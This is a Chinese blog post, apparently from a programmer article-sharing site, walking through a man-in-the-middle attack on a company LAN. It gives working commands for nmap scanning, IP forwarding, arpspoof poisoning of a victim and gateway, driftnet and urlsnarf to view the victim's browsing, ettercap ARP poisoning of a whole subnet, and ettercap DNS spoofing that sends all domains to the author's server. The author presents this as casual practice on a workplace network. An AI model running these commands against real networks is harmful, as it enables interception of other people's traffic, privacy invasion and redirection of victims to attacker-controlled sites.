欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

中间人攻击

程序员文章站 2022-05-01 09:37:41
...

正好在公司有机会玩玩内网渗透,于是实践一下中间人攻击
我所在的网段为10.0.100.0/24
攻击者主机IP:10.0.100.133
受害者主机IP:10.0.100.136
网关:10.0.100.1

扫描主机

先用nmap扫描看看目前内网中在使用的主机IP
使用命令

nmap -sS 10.0.100.*   //扫描整个网段中的主机情况,-sS为半开放扫描,扫描不容易被对方发现

中间人攻击

ARP毒化

使用arpspoof进行攻击

启用转发功能,linux的路由功能
此处设置为0时,arp欺骗后可以实现让对方断网

root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1

向受害者发送ARP欺骗冒充网关,IP转发关闭时这一步后目标主机就无法上网了

arpspoof -i eth0 -t 10.0.100.136 10.0.100.1

中间人攻击

向网关发送欺骗冒充受害者,有些网站上后面IP写成攻击者的IP,试了试好像也能成功,原因不清楚

arpspoof -i eth0 -t 10.0.100.1 10.0.100.136

中间人攻击
完成这两步后受害者主机与网关之间的流量都会经过攻击者电脑了,使用driftnet可以看到受害者浏览的图片

driftnet -i eth0 -ad ./drif 

driftnet,-i:选择网卡;-a:后台模式,图片保存在目录中不直接显示;-d:保存图片的路径
可以直接只指定网卡打开,即可不保存图片直接浏览,不过跳的很快看不见什么图就都过去了,建议使用上面的命令

driftnet -i eth0

用受害者电脑浏览网页后,攻击者电脑目录下即可看见受害者电脑浏览的图片
效果如下
中间人攻击

使用ettercap进行攻击
ettercap -i eth0 -Tq -M arp:remote /10.0.100.136// ///

不填写IP地址则默认对整个子网全部主机欺骗

ettercap -i eth0 -Tq -M arp:remote /// ///

-i, –iface #选择网卡
-T, –text #文本模式显示
-q, –quiet #安静模式,不显示嗅探数据
-M arp #ARP欺骗
remote #双向模式,同时arp欺骗通信的双方,参数 -M arp:remote
oneway #单向模式,只arp欺骗第一个目标到第二个目标的通信,参数 -M arp:oneway
之后就能使用driftnet查看受害者浏览的图片了,使用urlsnarf可以查看到受害者浏览的网页详细信息
中间人攻击
dsniff还有很多工具可以查看到被arp欺骗后的主机行为,后续再研究

DNS欺骗

arp欺骗之后可以继续进行dns欺骗,将目标主机向dns服务器发出的请求拦截,然后将解析的地址发送给目标主机。

ettercap实现dns欺骗
nano /etc/ettercap/etter.dns

用文本编辑器打开ettercap的dns文件
在最后加上

* A 10.0.100.132

这里10.0.100.132是我自己搭建的一个网站服务器,所有网页域名都解析为10.0.100.132这个地址

ettercap -T -i eth0 -q -P dns_spoof /10.0.100.136// ///

-P, –plugin #载入插件
这里加入了dns_spoof插件实现dns欺骗
不填ip则对子网中所有主机欺骗

受害者主机所有域名都被解析为10.0.100.132了

中间人攻击

中间人攻击
效果好像并不好,常用网站好像由于缓存原因劫持不了,虽然ping的时候都成功劫持了,浏览器上试有时候并不成功

相关标签: 中间人攻击

上一篇: 字符串压缩

下一篇: 压缩字符串